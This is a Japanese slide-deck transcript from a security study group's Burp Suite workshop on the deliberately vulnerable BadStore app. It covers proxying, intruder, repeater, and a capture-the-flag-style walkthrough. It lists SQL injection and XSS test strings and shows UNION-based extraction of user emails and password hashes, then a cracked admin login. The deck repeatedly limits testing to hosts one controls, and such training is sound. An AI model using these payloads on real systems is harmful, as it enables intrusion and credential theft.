Upgrade to Pro — share decks privately, control downloads, hide ads and more …

burpsuite_badstore

MarkUP
November 02, 2018
0
38

 burpsuite_badstore

MarkUP

November 02, 2018
Tweet

More Decks by MarkUP

See All by MarkUP
OwaspZap
markup
0
82
boot2root_kalilinux_bulldog
markup
0
22
boot2root_kalilinux_droopy
markup
0
25
侵入検知のファーストステップ
markup
0
640

Featured

See All Featured
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
118
51k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
102
19k
What's in a price? How to price your products and services
michaelherold
245
12k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.4k
Designing for Performance
lara
607
69k
How to train your dragon (web standard)
notwaldorf
91
6k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
51
2.4k
Testing 201, or: Great Expectations
jmmastey
42
7.4k
Visualization
eitanlees
146
16k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
49k
Optimizing for Happiness
mojombo
377
70k
Measuring & Analyzing Core Web Vitals
bluesmoon
6
370

Transcript

  1. インストールできてますか? Burp suite JAVA 8 ブラウザ (推奨:Firefox) (推奨:アドオン foxyproxy)

  2. @madamadaikeru22 Kobe Vulnerability AssessmenT

  3. 神戸脆弱性診断の会 #2 Burp suite ハンズオン

  4. 注意事項

  5. 絶対に、自分の管理下にないホストには脆弱性検 査を実行してはいけません。 www www www

  6. 桝谷 昌史 (ますたに まさふみ) 神戸デジタル・ラボ セキュリティソリューション事業部 Masafumi Masutani @madamadaikeru22

  7. 報告 速報 実施 事前確認 見積もり

  8. 報告 速報 実施 事前確認 見積もり

  9. HTTP通信

  10. HTTP Request

  11. Webページへのアクセス

  12. 実際にはHTTPと呼ばれるプロトコルを使用して通信をしています

  13. HTTPリクエストは3つに分けることができる。 リクエストライン メッセージヘッダ メッセージボディ GET / HTTP/1.1 メソッド リクエストURL プロトコルバージョン

  14. (参考)HTTP基礎入門 https://www.slideshare.net/BurpSuiteJapanUserGr/burpsuitejapanhttp

  15. None

  16. Burp suite free edition PortSwigger社が開発したProxyツールで無料版(free edition)と有料版(pro)があり、有料版には動的スキャン 機能など使用可能になる 無料版はHTTP通信を確認し、改ざんするProxy機能が 利用できます

  17. ブラウザ サーバ HTTPリクエスト HTTPレスポンス ブラウザ サーバ リクエスト レスポンス プロキシ 改変した

    リクエスト レスポンス 通常の挙動 Burpを使用する場合 プロキシ機能によってリクエストを改変し脆弱性を確認する ブラウザの通常操作では出来ないリクエストを試行できる
  18. None
  19. None
  20. None
  21. None
  22. None
  23. None
  24. None

  25. 検証サイト

  26. BadStore 脆弱性スキャンツールのテストあるいは脆弱性内容の学習を目 的として、意図的に脆弱性が作り込まれたWebアプリケーション

  27. 箱庭BadStore burp extension https://github.com/ankokuty/HakoniwaBadStore

  28. 箱庭BadStore burp extension

  29. None
  30. None

  31. 動作不良時の対応 何かがうまくいかないときは、/cgi-bin/initdbs.cgiにアクセスしてデータベース をリセットしてください。 一時ディレクトリ(C:¥Users¥{user}¥AppData¥Local¥Temp¥.badstore¥da ta)を削除し、Hakoniwa BadStoreサーバーを再起動します。

  32. (参考)The Broken Web Applications BWA (The Broken Web Applications) プロジェクトは、

    既知の脆弱性を持ったいろいろなアプリケーションを 稼働させる仮想マシンを提供します。 ・Webアプリケーションのセキュリティを学びたい ・自動診断ツールをテストしたい ・ソースコード分析ツールをテストしたい ・WAFや、それに類するコード技術をテストしたい など https://sourceforge.net/projects/owaspbwa/files/1.2/

  33. VM内容 1. トレーニング・アプリケーション 特定の脆弱性毎に学べるようにガイドしてくれるWebアプリケーションです。 2. 現実的で意図的に脆弱なアプリケーション 現実的なWebアプリケーションに見える Webアプリケーション(実際は幅広い脆弱性を持っている)です。 3. 実際のアプリケーションの古いバージョン

    既知の問題を持ったオープンソースアプリケーションです。

  34. VM内容 4. ツールテストのためのアプリケーション Webアプリケーション・セキュリティ・スキャナのような 自動化ツールをテストするためのアプリケーションです。 5. ページもしくは小さなアプリケーションのデモ 特定のコンセプトをデモするために、脆弱性を持たせた 小さなアプリケーションです。 6.

    OWASP デモ・アプリケーション OWASPアプリケーションのデモで、脆弱性は持っていません。

  35. プロキシ機能

  36. ブラウザのプロキシ

  37. None
  38. None
  39. None
  40. None
  41. None

  42. パラメータ値の改ざん

  43. None
  44. None
  45. None

  46. intruder機能

  47. 様々な診断タスクを自動化できる機能 ・予め登録した診断パターンを自動的に送信し、レスポンスの中から不審 な挙動を探し出す ・ID番号を順に変化させながら送信し、レスポンスに含まれるデータ収集 する ・ユーザー名とパスワードのリストを用意し、認証機能に対して全ての組み 合わせを試す intruder

  48. None
  49. None
  50. None
  51. None

  52. repeater機能

  53. None
  54. None
  55. None

  56. 脆弱性

  57. SQLインジェクション SQLインジェクションとは、データベースと連動したWebサ イトで、データベースへの問い合わせや操作を行うプロ グラムにパラメータとしてSQL文の断片を与えることによ り、データベースを改ざんしたり不正に情報を入手される ような脆弱性。

  58. XSS クロス・サイト・スクリプティング(XSS)とは、利用者がWeb サイトにアクセスした際に、意図しない不正なJavaスクリ プトコードなどを実行されてしまう脆弱性である。

  59. ハンズオン

  60. 注意事項

  61. 絶対に、自分の管理下にないホストには脆弱性検 査を実行してはいけません。 www www www

  62. 脆弱性診断ガイドライン このガイドラインは脆弱性診断士スキルマッププロジェクトによって 作成されました。 Webアプリケーションの脆弱性診断は、自動診断ツールを使った脆 弱性診断だけでは不十分であると言われています。 一定レベルの手動診断による脆弱性診断を行うため、最低限必要 な診断項目や手順を定義しているガイドラインです。

  63. 脆弱性診断士スキルマッププロジェクト 特定非営利活動法人日本ネットワークセキュリティ協会(JNSA)の日 本セキュリティオペレーション事業者協議会(ISOG-J)のセキュリティ オペレーションガイドラインWG(WG1)と、OWASP Japan主催の共同 ワーキンググループ 脆弱性診断を行う個人の技術的な能力を具体的にすべく、脆弱性 診断を行う技術者(以下、脆弱性診断士)のスキルマップと学習の指 針となるシラバス、脆弱性診断を行うためのガイドラインを整備して います。

    https://www.owasp.org/index.php/Pentester_Skillmap_Project_JP

  64. 情報セキュリティサービス基準

  65. 情報セキュリティサービス基準 たくさんのセキュリティサービスが普及している中、セキュリティの専 門知識をもたないサービス利用者がいる サービス事業者を選定しなければいけないとき、サービス品質を判 断することが難しい じゃあ良いサービスの基準をわかり易くまとめたので、これ使って!

  66. 情報セキュリティサービス基準

  67. 診断基準

  68. WebAppPentestGuidelines.pdf https://github.com/ueno1000/WebAppPentestGuidelines/raw/maste r/WebAppPentestGuidelines.pdf

  69. SQLインジェクション

  70. SQLインジェクション(マニュアル診断) ・問題点 トップページの検索機能においてSQLi が見つかりました。 ・対象パラメータ searchquery

  71. SQLインジェクション(マニュアル診断) ・検証方法 入力値 脆弱性あり 脆弱性なし '(シングルクォート) DB関連のエラーが表示されるか、正 常動作と挙動が異なる DB関連のエラーは表示されない ''(シングルクォート2つ)

    DB関連のエラーは表示されない DB関連のエラーは表示されない 入力値 結果 正規値 ※例:Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 ※この診断手法の脆弱性の有無については確定ではなく、あくまで可能性を示唆するものである

  72. 「'」 「''」

  73. SQLインジェクション(マニュアル診断) ・検証方法 入力値 結果 正規値 ※例:Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし (元の値:文字列)' and 'a'='a' 正常系の動作と比較して同一のレス ポンスとなる 正常系の動作と比較して異なるレスポン スとなる (元の値:文字列)' and 'a'='b' 正常系の動作と比較して異なるレス ポンスとなる 正常系の動作と比較して異なるレスポン スとなる

  74. 「' or 'a'='a' --」 「' or 'a'='b' --」

  75. XSS

  76. 反射型XSS ・問題点 トップページの検索機能において反射 型のXSSが見つかりました。 ・対象パラメータ searchquery

  77. 反射・格納型XSS(マニュアル診断) ・検証方法 入力値 結果 正規値 ※例:Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし ">'><s>XSS 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される <script>alert(1)</script> 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される javascript:alert(1) URI属性やjavascriptコード等に挿入され、 javascriptスキームとして有効になる javascriptスキームとして有効にならな い '+alert(1)+' 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される "onmouseover="alert(1) 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される

  78. DomBasedXSS(マニュアル診断) ・検証方法 入力値 結果 正規値 ※例:Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし #">'><img src=x onerror=alert(1)> スクリプトが実行される スクリプトが実行されない

  79. 「<script>alert(1);</script>」

  80. 診断開始

  81. None

  82. パラメータ 入力値 診断結果 name <script>alert(1)</script> XSSの脆弱性あり email <script>alert(1)</script> XSSの脆弱性あり comments

    <script>alert(1)</script> XSSの脆弱性あり
  83. None

  84. パラメータ 入力値 診断結果 email ' or 'a'='a' -- SQLiの脆弱性あり email

    <script>alert(1)</script> XSSの脆弱性あり
  85. None

  86. intruderをつかってみる

  87. None
  88. None
  89. None
  90. None
  91. None
  92. None
  93. None
  94. None
  95. None
  96. None

  97. 問題

  98. 問題 Q. 管理者ユーザでログインせよ。

  99. 正常動作 searchquery=test

  100. エラー searchquery=a

  101. カラム数 searchquery=' union select 1,2,3,4,5 --

  102. カラム数 searchquery=' union select 1,2,3,4 --

  103. sqlite_master sqlite_masterテーブルは、データベースファイル毎に一つだけ生成されます。 カラム名 内容 type オブジェクトタイプ "table", "index", "trigger", "view"のいずれかが格納される

    name オブジェクトの名前 typeが"table"もしくは"view"の場合はtbl_nameと一致する tbl_namerootpage オブジェクトが所属するテーブルの名前 sql オブジェクトを生成する際に実行されたSQL文(CREATE TABLE, CREATE INDEX, CREATE VIEW, CREATE TRIGGER等)が格納される

  104. テーブル名とカラム名 searchquery= 'union select 0,name,sql,4 from sqlite_master --

  105. userdbテーブル

  106. ユーザ情報 searchquery='union select 0,email,passwd,4 from userdb --

  107. ハッシュ値 email「admin」のpasswd「5EBE2294ECD0E0F08EAB7690D2A6EE69」を取得するが、 そのままログインしても失敗するのでパスワードのハッシュ化を疑います。 ハッシュクラッキングサイトを使用して元の値を探します。 https://hashtoolkit.com/

  108. 管理者ログイン成功

  109. まとめ

  110. 脆弱性診断のツールを紹介しましたが、 ツールの使い方ができたからと言って 「診断ができる」わけではありません。 脆弱性検証技術は個人差があるため 常に精進することが必要!!

  111. ご清聴ありがとうございました。 ▪神戸脆弱性診断の会 ・勉強会告知 フェイスブックグループ https://www.facebook.com/groups/1407869585989208/ Slackグループ https://kobevat.slack.com ・勉強会記事 はてなブログ http://madamadaikeru222san.hatenablog.com/